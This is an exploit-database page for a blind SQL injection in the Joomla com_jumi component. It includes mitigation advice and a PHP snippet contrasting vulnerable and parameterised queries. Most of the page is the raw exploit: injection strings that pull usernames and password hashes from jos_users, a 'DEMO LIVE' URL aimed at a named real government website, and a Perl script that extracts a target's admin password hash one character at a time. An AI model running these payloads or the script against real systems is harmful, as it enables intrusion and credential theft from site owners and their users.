Vendor: com_jumi
Author: Chip D3 Bi0s
CVSS: 8.8 (HIGH)
Vulnerability: Blind SQL injection
CWE: 89
Product Name: com_jumi
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability

A Blind SQL injection vulnerability exists in the Joomla component com_jumi. The 'fileid' URL parameter is used in a database query without being validated, so an attacker can send a specially crafted HTTP request whose fileid value carries SQL code, for example http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>, and infer data from the database from the application's true/false responses. Because the query is blind, the data is extracted one character at a time, which can include usernames and passwords.

Mitigation:

The best way to mitigate this vulnerability is to validate all user input (the fileid parameter should only ever be a number) and to sanitize it properly before it is used in any SQL query.
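To make the mitigation concrete, here is an added illustration (not com_jumi's own code, which this page does not show) of the vulnerable concatenation pattern beside a hardened version that allow-lists fileid as a number and binds it as a typed parameter; the table name jumi_files and the sample row are hypothetical.

```php
<?php
// Added illustration for the mitigation above; not the com_jumi source, which
// this page does not show. The table name 'jumi_files' is a hypothetical stand-in.

// VULNERABLE pattern: the raw 'fileid' value is spliced into the SQL string, so a
// value such as  2' and ascii(substring(...))=101/*  becomes part of the query and
// whether the page renders leaks one bit of the result per request.
function loadFileVulnerable(PDO $db, array $request): ?array
{
    $fileid = $request['fileid'] ?? '';
    $sql = "SELECT id, title FROM jumi_files WHERE id = '" . $fileid . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED pattern: fileid is documented as a number, so allow-list that shape and
// then bind the value as an integer parameter; the database never parses it as SQL.
function loadFileHardened(PDO $db, array $request): ?array
{
    $raw = (string) ($request['fileid'] ?? '');
    if (!preg_match('/^[0-9]{1,10}$/', $raw)) {
        return null;                    // reject rather than "clean up" the input
    }
    $stmt = $db->prepare('SELECT id, title FROM jumi_files WHERE id = :id');
    $stmt->bindValue(':id', (int) $raw, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demo on an in-memory SQLite database with constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jumi_files (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO jumi_files VALUES (2, 'sample file')");

$probe = ['fileid' => "2' AND 1=1/*"];       // boolean probe in the page's comment style
var_dump(loadFileVulnerable($db, $probe));   // injected condition is evaluated: row returned
var_dump(loadFileHardened($db, $probe));     // fails the allow-list: NULL, no query is sent
var_dump(loadFileHardened($db, ['fileid' => '2']));  // legitimate request: row returned
```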

Exploit-DB raw data:

------------------------------------------------------------------------------
Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 #####################################################



Example:
http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>

n = a valid numeric fileid

<Sql code>:
'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...

DEMO LIVE:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*

etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

If you want to save yourself the manual work, you can use the following script:

-------------------------------

#!/usr/bin/perl
# Blind SQL-injection helper for Joomla com_jumi (fileid), by Chip d3 Bi0s.
# Reads the first jos_users password (a 32-character hex hash) one character
# at a time: for each position it tries every hex digit and checks whether
# the page still renders normally (the marker "com_" appears in the body).

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

print "\t\t-------------------------------------------------------------\n\n";
print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection        \n\n";
print "\t\t-----------------------------------------------------------------\n\n";

print "http://wwww.host.org/Path: ";
chomp(my $target = <STDIN>);
print " [-] Introduce fileid: ";
chomp(my $z = <STDIN>);

print " [+] Password: ";

my $column_name = "concat(password)";
my $table_name  = "jos_users";

my $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
$ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

# $x is the character position within the hash (1..32);
# $c is the ASCII code under test: 48-57 ('0'-'9') and 97-102 ('a'-'f').
for my $x (1 .. 32) {
    for my $c (48 .. 57, 97 .. 102) {
        my $host = $target . "/index.php?option=com_jumi&fileid=" . $z
                 . "'+and+ascii(substring((SELECT+" . $column_name
                 . "+from+" . $table_name . "+limit+0,1)," . $x . ",1))=" . $c . "/*";
        my $res     = $ua->request(HTTP::Request->new(GET => $host));
        my $content = $res->content;
        my $regexp  = "com_";
        # print "limit:$x; ascii:$c;";   # debug output
        # A true condition renders the page normally, so the marker is present.
        if ($content =~ /$regexp/) { my $char = chr($c); print "$char"; }
    }
}
print "\n";

# milw0rm.com [2009-06-15]